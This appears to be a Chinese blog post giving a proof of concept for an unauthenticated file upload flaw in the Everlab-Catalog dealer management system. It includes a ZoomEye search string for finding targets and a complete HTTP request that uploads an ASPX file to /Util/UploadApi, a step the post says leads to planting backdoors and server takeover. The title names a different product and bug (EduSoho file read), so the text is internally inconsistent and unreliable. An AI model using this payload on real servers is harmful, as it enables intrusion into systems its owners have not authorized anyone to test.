Babing
Published on 2024-08-30 / 1 Visits
0
0

E5-1EduSoho-教培系统-任意文件读取

E5-1EduSoho-教培系统-任意文件读取

漏洞描述:

Everlab-Catalog经销商管理系统 /Util/UploadApi接口处存在任意文件上传漏洞,未经授权的攻击者可上传任意后门文件,进而控制整个服务器。(EDU刷分)

网站图片:

image-20240621111059089

网络测绘:

fofa语法:

钟馗之眼:app:“Everlab Catalog”

漏洞复现:

payload:

POST /Util/UploadApi HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
Upgrade-Insecure-Requests: 1

--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: image/jpeg

<% Response.Write("Hello, World") %>
--59229605f98b8cf290a7b8908b34616b--

效果图:
8e0abd53dadf4dd3b7f84962a05c0a55.png
回显了完整路径
验证


Comment